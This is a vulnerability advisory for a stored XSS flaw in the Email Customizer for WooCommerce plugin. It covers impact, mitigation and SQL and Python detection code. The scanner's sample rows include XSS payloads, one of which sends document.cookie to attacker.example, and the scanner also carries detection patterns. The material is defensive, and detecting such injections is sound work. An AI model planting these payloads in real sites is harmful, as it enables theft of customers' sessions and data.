CVE-2025-13974
Stored XSS in Email Customizer for WooCommerce Plugin
Publication date: 2026-01-07
Last updated on: 2026-04-08
Assigner: Wordfence
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| themehigh | email_customizer_for_woocommerce | up to and including 2.6.7 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
How can this vulnerability impact me?
An attacker who already holds administrator-level access can store malicious script in the plugin's email templates. The script runs when a customer's browser renders the stored template HTML, as when viewing a transactional email, giving the attacker script execution in the customer's browser context; that could expose customer data or session information, or perform actions on the customer's behalf. Most mail clients strip or refuse to run JavaScript in messages, so the realistic exposure depends on where the template HTML is rendered in a browser. Consistent with that, the impact is limited confidentiality and integrity loss with no availability impact.
Can you explain this vulnerability to me?
This is a Stored Cross-Site Scripting (XSS) flaw in the Email Customizer for WooCommerce plugin for WordPress, affecting all versions up to and including 2.6.7. The plugin does not sufficiently sanitize email template content on save or escape it on output, so an authenticated user with administrator-level access can store script in a template, and that script executes when a customer views the resulting transactional email. On a standard single-site WordPress install this is not a vulnerability in itself, because administrators hold the unfiltered_html capability and are allowed to save raw HTML. It matters only where administrators lack that capability: on multisite installations, where only super admins have unfiltered_html, or on sites where the capability has been disabled (for example via the DISALLOW_UNFILTERED_HTML constant). That is why the issue only affects multi-site installations or those where unfiltered_html is disabled.
What immediate steps should I take to mitigate this vulnerability?
Update the Email Customizer for WooCommerce plugin to a release later than 2.6.7, where the issue is fixed. Until then, restrict who can edit the plugin's email templates: only trusted administrators should have that access, especially on multisite installations or where unfiltered_html is disabled, since those are the environments in which the flaw is exploitable. Also review the existing email templates for injected script and clean them; an update hardens the save path but typically does not remove content that was already stored.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Start by checking whether the plugin is installed at version 2.6.7 or earlier, and whether the site is one where the issue is actually exploitable: a multisite network, or a single site where the unfiltered_html capability has been disabled for administrators. Since the vulnerability is stored XSS in email templates, detecting exploitation means looking for unexpected script tags or JavaScript in the template content itself: inspect the templates through the WordPress admin interface, or query the database for template content containing script. The resources do not provide specific commands, but a starting query, assuming the templates are stored as options under the default wp_ table prefix, is:

```sql
SELECT * FROM wp_options
WHERE option_name LIKE '%email_customizer%'
  AND option_value LIKE '%<script%';
```

Adjust the table prefix and the search location to match the site (templates may live in options, in post content or meta, in plugin-specific tables, or in template files under the plugin directory), and keep in mind that a bare '<script' match misses inline event handlers (onerror=, onload=) and javascript: URLs, so widen the patterns before treating a clean result as proof of absence. Reviewing outgoing emails for embedded script can also surface exploitation. [1, 3]
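The detection logic above, carried a step further as an added example that is not part of the CVE record or the plugin's own code: it checks the installed version against the affected range, scans stored template rows for injection patterns wider than a bare '<script' match (inline event handlers, javascript: URLs, svg/iframe tags), and emits an equivalent MySQL query for running against a live site. The sample rows and their option names are constructed for the example; the real plugin may store templates under different names or in a different table.

```python
"""Scan stored email-template content for injected script (added example).

Assumptions: option names beginning with 'email_customizer_' and storage in
the options table are illustrative, not verified against the plugin.
"""
import re
from typing import Iterable, List, Tuple

# Patterns that indicate script injection in HTML that will be rendered in a browser.
# A plain '<script' search misses the last three categories.
SUSPICIOUS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    "event_handler": re.compile(r"\son[a-z]+\s*=", re.IGNORECASE),
    "javascript_uri": re.compile(r"(?:href|src|action)\s*=\s*['\"]?\s*javascript:", re.IGNORECASE),
    "svg_or_iframe": re.compile(r"<\s*(?:svg|iframe|object|embed)\b", re.IGNORECASE),
}

LAST_AFFECTED = (2, 6, 7)  # the record lists versions up to and including 2.6.7


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '2.6.7' into (2, 6, 7) for tuple comparison; non-numeric suffixes are dropped."""
    parts = []
    for piece in version.strip().split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group()) if digits else 0)
    return tuple(parts)


def is_affected_version(version: str) -> bool:
    """True for any release up to and including 2.6.7."""
    return parse_version(version) <= LAST_AFFECTED


def find_suspicious(rows: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return (row_name, pattern_name) for every row whose value matches a pattern."""
    hits = []
    for name, value in rows:
        for pattern_name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(value):
                hits.append((name, pattern_name))
    return hits


def build_sql(table_prefix: str = "wp_") -> str:
    """MySQL equivalent of the scan, e.g. for `wp db query`; the prefix is site-specific.
    LIKE is case-insensitive under the usual WordPress collations."""
    clauses = [
        "option_value LIKE '%<script%'",
        "option_value LIKE '%javascript:%'",
        "option_value REGEXP '[[:space:]]on[a-z]+[[:space:]]*='",
        "option_value LIKE '%<svg%'",
        "option_value LIKE '%<iframe%'",
    ]
    return (
        f"SELECT option_id, option_name FROM {table_prefix}options "
        "WHERE option_name LIKE '%email_customizer%' "
        f"AND ({' OR '.join(clauses)});"
    )


# Constructed sample rows in the shape (option_name, option_value); not real plugin data.
SAMPLE_ROWS = [
    ("email_customizer_template_clean", "<p>Thanks for your order, {customer_name}!</p>"),
    ("email_customizer_template_script",
     "<p>Hi</p><script>fetch('https://attacker.example/?c='+document.cookie)</script>"),
    ("email_customizer_template_handler", '<img src="x" onerror="alert(document.domain)">'),
    ("email_customizer_template_link", '<a href="javascript:alert(1)">Track order</a>'),
    ("unrelated_option", "onboarding=complete"),  # 'on...=' without leading space: not a handler
]


if __name__ == "__main__":
    print("2.6.7 affected:", is_affected_version("2.6.7"))
    for name, why in find_suspicious(SAMPLE_ROWS):
        print(f"{name}: {why}")
    print(build_sql())
```

The Python scan is meant for a dumped or exported set of rows; on the live site, the string returned by build_sql() can be passed to WP-CLI's `wp db query`, with the table prefix set to whatever wp-config.php defines. The event-handler pattern deliberately requires leading whitespace so that ordinary text such as "onboarding=complete" does not trigger it.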
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The provided information does not specify how this vulnerability impacts compliance with common standards and regulations such as GDPR or HIPAA.